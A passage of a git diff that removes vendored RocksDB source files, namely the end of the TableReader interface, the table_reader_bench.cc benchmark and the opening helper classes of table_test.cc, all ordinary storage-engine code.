-  // posix_fadvise
-  virtual void SetupForCompaction() = 0;
-
-  virtual std::shared_ptr<const TableProperties> GetTableProperties() const = 0;
-
-  // Prepare work that can be done before the real Get()
-  virtual void Prepare(const Slice& target) {}
-
-  // Report an approximation of how much memory has been used.
-  virtual size_t ApproximateMemoryUsage() const = 0;
-
-  // Calls get_context->SaveValue() repeatedly, starting with
-  // the entry found after a call to Seek(key), until it returns false.
-  // May not make such a call if filter policy says that key is not present.
-  //
-  // get_context->MarkKeyMayExist needs to be called when it is configured to be
-  // memory only and the key is not found in the block cache.
-  //
-  // readOptions is the options for the read
-  // key is the key to search for
-  // skip_filters: disables checking the bloom filters even if they exist. This
-  //               option is effective only for block-based table format.
-  virtual Status Get(const ReadOptions& readOptions, const Slice& key,
-                     GetContext* get_context, bool skip_filters = false) = 0;
-
-  // Prefetch data corresponding to a give range of keys
-  // Typically this functionality is required for table implementations that
-  // persists the data on a non volatile storage medium like disk/SSD
-  virtual Status Prefetch(const Slice* begin = nullptr,
-                          const Slice* end = nullptr) {
-    (void) begin;
-    (void) end;
-    // Default implementation is NOOP.
-    // The child class should implement functionality when applicable
-    return Status::OK();
-  }
-
-  // convert db file to a human readable form
-  virtual Status DumpTable(WritableFile* out_file) {
-    return Status::NotSupported("DumpTable() not supported");
-  }
-
-  // check whether there is corruption in this db file
-  virtual Status VerifyChecksum() {
-    return Status::NotSupported("VerifyChecksum() not supported");
-  }
-
-  virtual void Close() {}
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/table_reader_bench.cc b/thirdparty/rocksdb/table/table_reader_bench.cc
deleted file mode 100644
index 85e48c1..0000000
--- a/thirdparty/rocksdb/table/table_reader_bench.cc
+++ /dev/null
@@ -1,341 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#include <gflags/gflags.h>
-
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "monitoring/histogram.h"
-#include "rocksdb/db.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "table/block_based_table_factory.h"
-#include "table/get_context.h"
-#include "table/internal_iterator.h"
-#include "table/plain_table_factory.h"
-#include "table/table_builder.h"
-#include "util/file_reader_writer.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::SetUsageMessage;
-
-namespace rocksdb {
-
-namespace {
-// Make a key that i determines the first 4 characters and j determines the
-// last 4 characters.
-static std::string MakeKey(int i, int j, bool through_db) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "%04d__key___%04d", i, j);
-  if (through_db) {
-    return std::string(buf);
-  }
-  // If we directly query table, which operates on internal keys
-  // instead of user keys, we need to add 8 bytes of internal
-  // information (row type etc) to user key to make an internal
-  // key.
-  InternalKey key(std::string(buf), 0, ValueType::kTypeValue);
-  return key.Encode().ToString();
-}
-
-uint64_t Now(Env* env, bool measured_by_nanosecond) {
-  return measured_by_nanosecond ? env->NowNanos() : env->NowMicros();
-}
-}  // namespace
-
-// A very simple benchmark that.
-// Create a table with roughly numKey1 * numKey2 keys,
-// where there are numKey1 prefixes of the key, each has numKey2 number of
-// distinguished key, differing in the suffix part.
-// If if_query_empty_keys = false, query the existing keys numKey1 * numKey2
-// times randomly.
-// If if_query_empty_keys = true, query numKey1 * numKey2 random empty keys.
-// Print out the total time.
-// If through_db=true, a full DB will be created and queries will be against
-// it. Otherwise, operations will be directly through table level.
-//
-// If for_terator=true, instead of just query one key each time, it queries
-// a range sharing the same prefix.
-namespace {
-void TableReaderBenchmark(Options& opts, EnvOptions& env_options,
-                          ReadOptions& read_options, int num_keys1,
-                          int num_keys2, int num_iter, int prefix_len,
-                          bool if_query_empty_keys, bool for_iterator,
-                          bool through_db, bool measured_by_nanosecond) {
-  rocksdb::InternalKeyComparator ikc(opts.comparator);
-
-  std::string file_name = test::TmpDir()
-      + "/rocksdb_table_reader_benchmark";
-  std::string dbname = test::TmpDir() + "/rocksdb_table_reader_bench_db";
-  WriteOptions wo;
-  Env* env = Env::Default();
-  TableBuilder* tb = nullptr;
-  DB* db = nullptr;
-  Status s;
-  const ImmutableCFOptions ioptions(opts);
-  unique_ptr<WritableFileWriter> file_writer;
-  if (!through_db) {
-    unique_ptr<WritableFile> file;
-    env->NewWritableFile(file_name, &file, env_options);
-
-    std::vector<std::unique_ptr<IntTblPropCollectorFactory> >
-        int_tbl_prop_collector_factories;
-
-    file_writer.reset(new WritableFileWriter(std::move(file), env_options));
-    int unknown_level = -1;
-    tb = opts.table_factory->NewTableBuilder(
-        TableBuilderOptions(ioptions, ikc, &int_tbl_prop_collector_factories,
-                            CompressionType::kNoCompression,
-                            CompressionOptions(),
-                            nullptr /* compression_dict */,
-                            false /* skip_filters */, kDefaultColumnFamilyName,
-                            unknown_level),
-        0 /* column_family_id */, file_writer.get());
-  } else {
-    s = DB::Open(opts, dbname, &db);
-    ASSERT_OK(s);
-    ASSERT_TRUE(db != nullptr);
-  }
-  // Populate slightly more than 1M keys
-  for (int i = 0; i < num_keys1; i++) {
-    for (int j = 0; j < num_keys2; j++) {
-      std::string key = MakeKey(i * 2, j, through_db);
-      if (!through_db) {
-        tb->Add(key, key);
-      } else {
-        db->Put(wo, key, key);
-      }
-    }
-  }
-  if (!through_db) {
-    tb->Finish();
-    file_writer->Close();
-  } else {
-    db->Flush(FlushOptions());
-  }
-
-  unique_ptr<TableReader> table_reader;
-  if (!through_db) {
-    unique_ptr<RandomAccessFile> raf;
-    s = env->NewRandomAccessFile(file_name, &raf, env_options);
-    if (!s.ok()) {
-      fprintf(stderr, "Create File Error: %s\n", s.ToString().c_str());
-      exit(1);
-    }
-    uint64_t file_size;
-    env->GetFileSize(file_name, &file_size);
-    unique_ptr<RandomAccessFileReader> file_reader(
-        new RandomAccessFileReader(std::move(raf), file_name));
-    s = opts.table_factory->NewTableReader(
-        TableReaderOptions(ioptions, env_options, ikc), std::move(file_reader),
-        file_size, &table_reader);
-    if (!s.ok()) {
-      fprintf(stderr, "Open Table Error: %s\n", s.ToString().c_str());
-      exit(1);
-    }
-  }
-
-  Random rnd(301);
-  std::string result;
-  HistogramImpl hist;
-
-  for (int it = 0; it < num_iter; it++) {
-    for (int i = 0; i < num_keys1; i++) {
-      for (int j = 0; j < num_keys2; j++) {
-        int r1 = rnd.Uniform(num_keys1) * 2;
-        int r2 = rnd.Uniform(num_keys2);
-        if (if_query_empty_keys) {
-          r1++;
-          r2 = num_keys2 * 2 - r2;
-        }
-
-        if (!for_iterator) {
-          // Query one existing key;
-          std::string key = MakeKey(r1, r2, through_db);
-          uint64_t start_time = Now(env, measured_by_nanosecond);
-          if (!through_db) {
-            PinnableSlice value;
-            MergeContext merge_context;
-            RangeDelAggregator range_del_agg(ikc, {} /* snapshots */);
-            GetContext get_context(ioptions.user_comparator,
-                                   ioptions.merge_operator, ioptions.info_log,
-                                   ioptions.statistics, GetContext::kNotFound,
-                                   Slice(key), &value, nullptr, &merge_context,
-                                   &range_del_agg, env);
-            s = table_reader->Get(read_options, key, &get_context);
-          } else {
-            s = db->Get(read_options, key, &result);
-          }
-          hist.Add(Now(env, measured_by_nanosecond) - start_time);
-        } else {
-          int r2_len;
-          if (if_query_empty_keys) {
-            r2_len = 0;
-          } else {
-            r2_len = rnd.Uniform(num_keys2) + 1;
-            if (r2_len + r2 > num_keys2) {
-              r2_len = num_keys2 - r2;
-            }
-          }
-          std::string start_key = MakeKey(r1, r2, through_db);
-          std::string end_key = MakeKey(r1, r2 + r2_len, through_db);
-          uint64_t total_time = 0;
-          uint64_t start_time = Now(env, measured_by_nanosecond);
-          Iterator* iter = nullptr;
-          InternalIterator* iiter = nullptr;
-          if (!through_db) {
-            iiter = table_reader->NewIterator(read_options);
-          } else {
-            iter = db->NewIterator(read_options);
-          }
-          int count = 0;
-          for (through_db ? iter->Seek(start_key) : iiter->Seek(start_key);
-               through_db ? iter->Valid() : iiter->Valid();
-               through_db ? iter->Next() : iiter->Next()) {
-            if (if_query_empty_keys) {
-              break;
-            }
-            // verify key;
-            total_time += Now(env, measured_by_nanosecond) - start_time;
-            assert(Slice(MakeKey(r1, r2 + count, through_db)) ==
-                   (through_db ? iter->key() : iiter->key()));
-            start_time = Now(env, measured_by_nanosecond);
-            if (++count >= r2_len) {
-              break;
-            }
-          }
-          if (count != r2_len) {
-            fprintf(
-                stderr, "Iterator cannot iterate expected number of entries. "
-                "Expected %d but got %d\n", r2_len, count);
-            assert(false);
-          }
-          delete iter;
-          total_time += Now(env, measured_by_nanosecond) - start_time;
-          hist.Add(total_time);
-        }
-      }
-    }
-  }
-
-  fprintf(
-      stderr,
-      "==================================================="
-      "====================================================\n"
-      "InMemoryTableSimpleBenchmark: %20s   num_key1:  %5d   "
-      "num_key2: %5d  %10s\n"
-      "==================================================="
-      "===================================================="
-      "\nHistogram (unit: %s): \n%s",
-      opts.table_factory->Name(), num_keys1, num_keys2,
-      for_iterator ? "iterator" : (if_query_empty_keys ? "empty" : "non_empty"),
-      measured_by_nanosecond ? "nanosecond" : "microsecond",
-      hist.ToString().c_str());
-  if (!through_db) {
-    env->DeleteFile(file_name);
-  } else {
-    delete db;
-    db = nullptr;
-    DestroyDB(dbname, opts);
-  }
-}
-}  // namespace
-}  // namespace rocksdb
-
-DEFINE_bool(query_empty, false, "query non-existing keys instead of existing "
-            "ones.");
-DEFINE_int32(num_keys1, 4096, "number of distinguish prefix of keys");
-DEFINE_int32(num_keys2, 512, "number of distinguish keys for each prefix");
-DEFINE_int32(iter, 3, "query non-existing keys instead of existing ones");
-DEFINE_int32(prefix_len, 16, "Prefix length used for iterators and indexes");
-DEFINE_bool(iterator, false, "For test iterator");
-DEFINE_bool(through_db, false, "If enable, a DB instance will be created and "
-            "the query will be against DB. Otherwise, will be directly against "
-            "a table reader.");
-DEFINE_bool(mmap_read, true, "Whether use mmap read");
-DEFINE_string(table_factory, "block_based",
-              "Table factory to use: `block_based` (default), `plain_table` or "
-              "`cuckoo_hash`.");
-DEFINE_string(time_unit, "microsecond",
-              "The time unit used for measuring performance. User can specify "
-              "`microsecond` (default) or `nanosecond`");
-
-int main(int argc, char** argv) {
-  SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                  " [OPTIONS]...");
-  ParseCommandLineFlags(&argc, &argv, true);
-
-  std::shared_ptr<rocksdb::TableFactory> tf;
-  rocksdb::Options options;
-  if (FLAGS_prefix_len < 16) {
-    options.prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(
-        FLAGS_prefix_len));
-  }
-  rocksdb::ReadOptions ro;
-  rocksdb::EnvOptions env_options;
-  options.create_if_missing = true;
-  options.compression = rocksdb::CompressionType::kNoCompression;
-
-  if (FLAGS_table_factory == "cuckoo_hash") {
-#ifndef ROCKSDB_LITE
-    options.allow_mmap_reads = FLAGS_mmap_read;
-    env_options.use_mmap_reads = FLAGS_mmap_read;
-    rocksdb::CuckooTableOptions table_options;
-    table_options.hash_table_ratio = 0.75;
-    tf.reset(rocksdb::NewCuckooTableFactory(table_options));
-#else
-    fprintf(stderr, "Plain table is not supported in lite mode\n");
-    exit(1);
-#endif  // ROCKSDB_LITE
-  } else if (FLAGS_table_factory == "plain_table") {
-#ifndef ROCKSDB_LITE
-    options.allow_mmap_reads = FLAGS_mmap_read;
-    env_options.use_mmap_reads = FLAGS_mmap_read;
-
-    rocksdb::PlainTableOptions plain_table_options;
-    plain_table_options.user_key_len = 16;
-    plain_table_options.bloom_bits_per_key = (FLAGS_prefix_len == 16) ? 0 : 8;
-    plain_table_options.hash_table_ratio = 0.75;
-
-    tf.reset(new rocksdb::PlainTableFactory(plain_table_options));
-    options.prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(
-        FLAGS_prefix_len));
-#else
-    fprintf(stderr, "Cuckoo table is not supported in lite mode\n");
-    exit(1);
-#endif  // ROCKSDB_LITE
-  } else if (FLAGS_table_factory == "block_based") {
-    tf.reset(new rocksdb::BlockBasedTableFactory());
-  } else {
-    fprintf(stderr, "Invalid table type %s\n", FLAGS_table_factory.c_str());
-  }
-
-  if (tf) {
-    // if user provides invalid options, just fall back to microsecond.
-    bool measured_by_nanosecond = FLAGS_time_unit == "nanosecond";
-
-    options.table_factory = tf;
-    rocksdb::TableReaderBenchmark(options, env_options, ro, FLAGS_num_keys1,
-                                  FLAGS_num_keys2, FLAGS_iter, FLAGS_prefix_len,
-                                  FLAGS_query_empty, FLAGS_iterator,
-                                  FLAGS_through_db, measured_by_nanosecond);
-  } else {
-    return 1;
-  }
-
-  return 0;
-}
-
-#endif  // GFLAGS
diff --git a/thirdparty/rocksdb/table/table_test.cc b/thirdparty/rocksdb/table/table_test.cc
deleted file mode 100644
index 178cf42..0000000
--- a/thirdparty/rocksdb/table/table_test.cc
+++ /dev/null
@@ -1,3108 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <stdio.h>
-
-#include <algorithm>
-#include <iostream>
-#include <map>
-#include <memory>
-#include <string>
-#include <vector>
-
-#include "cache/lru_cache.h"
-#include "db/dbformat.h"
-#include "db/memtable.h"
-#include "db/write_batch_internal.h"
-#include "memtable/stl_wrappers.h"
-#include "monitoring/statistics.h"
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/block.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_based_table_factory.h"
-#include "table/block_based_table_reader.h"
-#include "table/block_builder.h"
-#include "table/format.h"
-#include "table/get_context.h"
-#include "table/internal_iterator.h"
-#include "table/meta_blocks.h"
-#include "table/plain_table_factory.h"
-#include "table/scoped_arena_iterator.h"
-#include "table/sst_file_writer_collectors.h"
-#include "util/compression.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-extern const uint64_t kLegacyBlockBasedTableMagicNumber;
-extern const uint64_t kLegacyPlainTableMagicNumber;
-extern const uint64_t kBlockBasedTableMagicNumber;
-extern const uint64_t kPlainTableMagicNumber;
-
-namespace {
-
-// DummyPropertiesCollector used to test BlockBasedTableProperties
-class DummyPropertiesCollector : public TablePropertiesCollector {
- public:
-  const char* Name() const { return ""; }
-
-  Status Finish(UserCollectedProperties* properties) { return Status::OK(); }
-
-  Status Add(const Slice& user_key, const Slice& value) { return Status::OK(); }
-
-  virtual UserCollectedProperties GetReadableProperties() const {
-    return UserCollectedProperties{};
-  }
-};
-
-class DummyPropertiesCollectorFactory1
-    : public TablePropertiesCollectorFactory {
- public:
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) {
-    return new DummyPropertiesCollector();
-  }
-  const char* Name() const { return "DummyPropertiesCollector1"; }
-};
-
-class DummyPropertiesCollectorFactory2
-    : public TablePropertiesCollectorFactory {
- public:
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) {
-    return new DummyPropertiesCollector();
-  }
-  const char* Name() const { return "DummyPropertiesCollector2"; }
-};
-
-// Return reverse of "key".
-// Used to test non-lexicographic comparators.
-std::string Reverse(const Slice& key) {
-  auto rev = key.ToString();
-  std::reverse(rev.begin(), rev.end());
-  return rev;
-}
-
-class ReverseKeyComparator : public Comparator {
- public:
-  virtual const char* Name() const override {
-    return "rocksdb.ReverseBytewiseComparator";
-  }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    return BytewiseComparator()->Compare(Reverse(a), Reverse(b));
-  }
-
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {
-    std::string s = Reverse(*start);
-    std::string l = Reverse(limit);
-    BytewiseComparator()->FindShortestSeparator(&s, l);
-    *start = Reverse(s);
-  }
-
-  virtual void FindShortSuccessor(std::string* key) const override {
-    std::string s = Reverse(*key);
-    BytewiseComparator()->FindShortSuccessor(&s);
-    *key = Reverse(s);
-  }
-};
-
-ReverseKeyComparator reverse_key_comparator;
-
-void Increment(const Comparator* cmp, std::string* key) {
-  if (cmp == BytewiseComparator()) {
-    key->push_back('\0');
-  } else {
-    assert(cmp == &reverse_key_comparator);
-    std::string rev = Reverse(*key);
-    rev.push_back('\0');
-    *key = Reverse(rev);
-  }
-}
-
-}  // namespace
-
-// Helper class for tests to unify the interface between
-// BlockBuilder/TableBuilder and Block/Table.
-class Constructor {
- public:
-  explicit Constructor(const Comparator* cmp)
-      : data_(stl_wrappers::LessOfComparator(cmp)) {}
-  virtual ~Constructor() { }
-
-  void Add(const std::string& key, const Slice& value) {
-    data_[key] = value.ToString();
-  }
-
-  // Finish constructing the data structure with all the keys that have
-  // been added so far.  Returns the keys in sorted order in "*keys"
-  // and stores the key/value pairs in "*kvmap"
-  void Finish(const Options& options, const ImmutableCFOptions& ioptions,
-              const BlockBasedTableOptions& table_options,
-              const InternalKeyComparator& internal_comparator,
-              std::vector<std::string>* keys, stl_wrappers::KVMap* kvmap) {
-    last_internal_key_ = &internal_comparator;
-    *kvmap = data_;
-    keys->clear();
-    for (const auto& kv : data_) {
-      keys->push_back(kv.first);
-    }
-    data_.clear();
-    Status s = FinishImpl(options, ioptions, table_options,
-                          internal_comparator, *kvmap);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-  }
-
-  // Construct the data structure from the data in "data"
-  virtual Status FinishImpl(const Options& options,
-                            const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
-                            const InternalKeyComparator& internal_comparator,
-                            const stl_wrappers::KVMap& data) = 0;
-
-  virtual InternalIterator* NewIterator() const = 0;
-
-  virtual const stl_wrappers::KVMap& data() { return data_; }
-
-  virtual bool IsArenaMode() const { return false; }
-
-  virtual DB* db() const { return nullptr; }  // Overridden in DBConstructor
-
-  virtual bool AnywayDeleteIterator() const { return false; }
-
- protected:
-  const InternalKeyComparator* last_internal_key_;
-
- private:
-  stl_wrappers::KVMap data_;
-};
-
-class BlockConstructor: public Constructor {
- public:
-  explicit BlockConstructor(const Comparator* cmp)
-      : Constructor(cmp),
-        comparator_(cmp),
-        block_(nullptr) { }
-  ~BlockConstructor() {
-    delete block_;
-  }
-  virtual Status FinishImpl(const Options& options,
-                            const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
-                            const InternalKeyComparator& internal_comparator,
-                            const stl_wrappers::KVMap& kv_map) override {
-    delete block_;
-    block_ = nullptr;
-    BlockBuilder builder(table_options.block_restart_interval);
-
-    for (const auto kv : kv_map) {
-      builder.Add(kv.first, kv.second);
-    }
-    // Open the block
-    data_ = builder.Finish().ToString();
-    BlockContents contents;
-    contents.data = data_;
-    contents.cachable = false;
-    block_ = new Block(std::move(contents), kDisableGlobalSequenceNumber);
-    return Status::OK();
-  }
-  virtual InternalIterator* NewIterator() const override {
-    return block_->NewIterator(comparator_);
-  }
-
- private:
-  const Comparator* comparator_;
-  std::string data_;
-  Block* block_;
-
-  BlockConstructor();
-};
-
-// A helper class that converts internal format keys into user keys
-class KeyConvertingIterator : public InternalIterator {
- public:
-  explicit KeyConvertingIterator(InternalIterator* iter,
-                                 bool arena_mode = false)
-      : iter_(iter), arena_mode_(arena_mode) {}
-  virtual ~KeyConvertingIterator() {
-    if (arena_mode_) {
-      iter_->~InternalIterator();
-    } else {
-      delete iter_;
-    }
-  }
-  virtual bool Valid() const override { return iter_->Valid(); }
-  virtual void Seek(const Slice& target) override {
-    ParsedInternalKey ikey(target, kMaxSequenceNumber, kTypeValue);
-    std::string encoded;
-    AppendInternalKey(&encoded, ikey);
-    iter_->Seek(encoded);
-  }
-  virtual void SeekForPrev(const Slice& target) override {
-    ParsedInternalKey ikey(target, kMaxSequenceNumber, kTypeValue);
-    std::string encoded;
-    AppendInternalKey(&encoded, ikey);
-    iter_->SeekForPrev(encoded);
-  }
-  virtual void SeekToFirst() override { iter_->SeekToFirst(); }
-  virtual void SeekToLast() override { iter_->SeekToLast(); }
-  virtual void Next() override { iter_->Next(); }
-  virtual void Prev() override { iter_->Prev(); }
-
-  virtual Slice key() const override {
-    assert(Valid());
-    ParsedInternalKey parsed_key;
-    if (!ParseInternalKey(iter_->key(), &parsed_key)) {
-      status_ = Status::Corruption("malformed internal key");
-      return Slice("corrupted key");
-    }
-    return parsed_key.user_key;
-  }
-
-  virtual Slice value() const override { return iter_->value(); }
-  virtual Status status() const override {
-    return status_.ok() ? iter_->status() : status_;
-  }
-
- private:
-  mutable Status status_;
-  InternalIterator* iter_;
-  bool arena_mode_;
-
-  // No copying allowed
-  KeyConvertingIterator(const KeyConvertingIterator&);
-  void operator=(const KeyConvertingIterator&);
-};
-
-class TableConstructor: public Constructor {
- public:
-  explicit TableConstructor(const Comparator* cmp,
-                            bool convert_to_internal_key = false)
-      : Constructor(cmp),
-        convert_to_internal_key_(convert_to_internal_key) {}
-  ~TableConstructor() { Reset(); }
-
-  virtual Status FinishImpl(const Options& options,
-                            const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
-                            const InternalKeyComparator& internal_comparator,
-                            const stl_wrappers::KVMap& kv_map) override {
-    Reset();
-    soptions.use_mmap_reads = ioptions.allow_mmap_reads;
-    file_writer_.reset(test::GetWritableFileWriter(new test::StringSink()));
-    unique_ptr<TableBuilder> builder;
-    std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-        int_tbl_prop_collector_factories;
-    std::string column_family_name;
-    int unknown_level = -1;
-    builder.reset(ioptions.table_factory->NewTableBuilder(
-        TableBuilderOptions(ioptions, internal_comparator,
-                            &int_tbl_prop_collector_factories,
-                            options.compression, CompressionOptions(),
-                            nullptr /* compression_dict */,
-                            false /* skip_filters */, column_family_name,
-                            unknown_level),
-        TablePropertiesCollectorFactory::Context::kUnknownColumnFamily,
-        file_writer_.get()));
-
-    for (const auto kv : kv_map) {
-      if (convert_to_internal_key_) {
-        ParsedInternalKey ikey(kv.first, kMaxSequenceNumber, kTypeValue);
-        std::string encoded;
-        AppendInternalKey(&encoded, ikey);
-        builder->Add(encoded, kv.second);
-      } else {
-        builder->Add(kv.first, kv.second);
-      }
-      EXPECT_TRUE(builder->status().ok());
-    }
-    Status s = builder->Finish();
-    file_writer_->Flush();
-    EXPECT_TRUE(s.ok()) << s.ToString();
-
-    EXPECT_EQ(GetSink()->contents().size(), builder->FileSize());
-
-    // Open the table
-    uniq_id_ = cur_uniq_id_++;
-    file_reader_.reset(test::GetRandomAccessFileReader(new test::StringSource(
-        GetSink()->contents(), uniq_id_, ioptions.allow_mmap_reads)));
-    return ioptions.table_factory->NewTableReader(
-        TableReaderOptions(ioptions, soptions, internal_comparator),
-        std::move(file_reader_), GetSink()->contents().size(), &table_reader_);
-  }
-
-  virtual InternalIterator* NewIterator() const override {
-    ReadOptions ro;
-    InternalIterator* iter = table_reader_->NewIterator(ro);
-    if (convert_to_internal_key_) {
-      return new KeyConvertingIterator(iter);
-    } else {
-      return iter;
-    }
-  }
-
-  uint64_t ApproximateOffsetOf(const Slice& key) const {
-    if (convert_to_internal_key_) {
-      InternalKey ikey(key, kMaxSequenceNumber, kTypeValue);
-      const Slice skey = ikey.Encode();
-      return table_reader_->ApproximateOffsetOf(skey);
-    }
-    return table_reader_->ApproximateOffsetOf(key);
-  }
-
-  virtual Status Reopen(const ImmutableCFOptions& ioptions) {
-    file_reader_.reset(test::GetRandomAccessFileReader(new test::StringSource(
-        GetSink()->contents(), uniq_id_, ioptions.allow_mmap_reads)));
-    return ioptions.table_factory->NewTableReader(
-        TableReaderOptions(ioptions, soptions, *last_internal_key_),
-        std::move(file_reader_), GetSink()->contents().size(), &table_reader_);
-  }
-
-  virtual TableReader* GetTableReader() {
-    return table_reader_.get();
-  }
-
-  virtual bool AnywayDeleteIterator() const override {
-    return convert_to_internal_key_;
-  }
-
-  void ResetTableReader() { table_reader_.reset(); }
-
-  bool ConvertToInternalKey() { return convert_to_internal_key_; }
-
- private:
-  void Reset() {
-    uniq_id_ = 0;
-    table_reader_.reset();
-    file_writer_.reset();
-    file_reader_.reset();
-  }
-
-  test::StringSink* GetSink() {
-    return static_cast<test::StringSink*>(file_writer_->writable_file());
-  }
-
-  uint64_t uniq_id_;
-  unique_ptr<WritableFileWriter> file_writer_;
-  unique_ptr<RandomAccessFileReader> file_reader_;
-  unique_ptr<TableReader> table_reader_;
-  bool convert_to_internal_key_;
-
-  TableConstructor();
-
-  static uint64_t cur_uniq_id_;
-  EnvOptions soptions;
-};
-uint64_t TableConstructor::cur_uniq_id_ = 1;
-
-class MemTableConstructor: public Constructor {
- public:
-  explicit MemTableConstructor(const Comparator* cmp, WriteBufferManager* wb)
-      : Constructor(cmp),
-        internal_comparator_(cmp),
-        write_buffer_manager_(wb),
-        table_factory_(new SkipListFactory) {
-    options_.memtable_factory = table_factory_;
-    ImmutableCFOptions ioptions(options_);
-    memtable_ =
-        new MemTable(internal_comparator_, ioptions, MutableCFOptions(options_),
-                     wb, kMaxSequenceNumber, 0 /* column_family_id */);
-    memtable_->Ref();
-  }
-  ~MemTableConstructor() {
-    delete memtable_->Unref();
-  }
-  virtual Status FinishImpl(const Options&, const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
-                            const InternalKeyComparator& internal_comparator,
-                            const stl_wrappers::KVMap& kv_map) override {
-    delete memtable_->Unref();
-    ImmutableCFOptions mem_ioptions(ioptions);
-    memtable_ = new MemTable(internal_comparator_, mem_ioptions,
-                             MutableCFOptions(options_), write_buffer_manager_,
-                             kMaxSequenceNumber, 0 /* column_family_id */);
-    memtable_->Ref();
-    int seq = 1;
-    for (const auto kv : kv_map) {
-      memtable_->Add(seq, kTypeValue, kv.first, kv.second);
-      seq++;
-    }
-    return Status::OK();
-  }
-  virtual InternalIterator* NewIterator() const override {
-    return new KeyConvertingIterator(
-        memtable_->NewIterator(ReadOptions(), &arena_), true);
-  }
-
-  virtual bool AnywayDeleteIterator() const override { return true; }
-
-  virtual bool IsArenaMode() const override { return true; }
-
- private:
-  mutable Arena arena_;
-  InternalKeyComparator internal_comparator_;
-  Options options_;
-  WriteBufferManager* write_buffer_manager_;
-  MemTable* memtable_;
-  std::shared_ptr<SkipListFactory> table_factory_;
-};
-
-class InternalIteratorFromIterator : public InternalIterator {
- public:
-  explicit InternalIteratorFromIterator(Iterator* it) : it_(it) {}
-  virtual bool Valid() const override { return it_->Valid(); }
-  virtual void Seek(const Slice& target) override { it_->Seek(target); }
-  virtual void SeekForPrev(const Slice& target) override {
-    it_->SeekForPrev(target);
-  }
-  virtual void SeekToFirst() override { it_->SeekToFirst(); }
-  virtual void SeekToLast() override { it_->SeekToLast(); }
-  virtual void Next() override { it_->Next(); }
-  virtual void Prev() override { it_->Prev(); }
-  Slice key() const override { return it_->key(); }
-  Slice value() const override { return it_->value(); }
-  virtual Status status() const override { return it_->status(); }
-
- private:
-  unique_ptr<Iterator> it_;
-};
-
-class DBConstructor: public Constructor {
- public:
-  explicit DBConstructor(const Comparator* cmp)
-      : Constructor(cmp),
-        comparator_(cmp) {
-    db_ = nullptr;
-    NewDB();
-  }
-  ~DBConstructor() {
-    delete db_;
-  }
-  virtual Status FinishImpl(const Options& options,
-                            const ImmutableCFOptions& ioptions,
-                            const BlockBasedTableOptions& table_options,
-                            const InternalKeyComparator& internal_comparator,
-                            const stl_wrappers::KVMap& kv_map) override {
-    delete db_;
-    db_ = nullptr;
-    NewDB();
-    for (const auto kv : kv_map) {
-      WriteBatch batch;
-      batch.Put(kv.first, kv.second);
-      EXPECT_TRUE(db_->Write(WriteOptions(), &batch).ok());
-    }
-    return Status::OK();
-  }
-
-  virtual InternalIterator* NewIterator() const override {
-    return new InternalIteratorFromIterator(db_->NewIterator(ReadOptions()));
-  }
-
-  virtual DB* db() const override { return db_; }
-
- private:
-  void NewDB() {
-    std::string name = test::TmpDir() + "/table_testdb";
-
-    Options options;
-    options.comparator = comparator_;
-    Status status = DestroyDB(name, options);
-    ASSERT_TRUE(status.ok()) << status.ToString();
-
-    options.create_if_missing = true;
-    options.error_if_exists = true;
-    options.write_buffer_size = 10000;  // Something small to force merging
-    status = DB::Open(options, name, &db_);
-    ASSERT_TRUE(status.ok()) << status.ToString();
-  }
-
-  const Comparator* comparator_;
-  DB* db_;
-};
-
-enum TestType {
-  BLOCK_BASED_TABLE_TEST,
-#ifndef ROCKSDB_LITE
-  PLAIN_TABLE_SEMI_FIXED_PREFIX,
-  PLAIN_TABLE_FULL_STR_PREFIX,
-  PLAIN_TABLE_TOTAL_ORDER,
-#endif  // !ROCKSDB_LITE
-  BLOCK_TEST,
-  MEMTABLE_TEST,
-  DB_TEST
-};
-
-struct TestArgs {
-  TestType type;
-  bool reverse_compare;
-  int restart_interval;
-  CompressionType compression;
-  uint32_t format_version;
-  bool use_mmap;
-};
-
-static std::vector<TestArgs> GenerateArgList() {
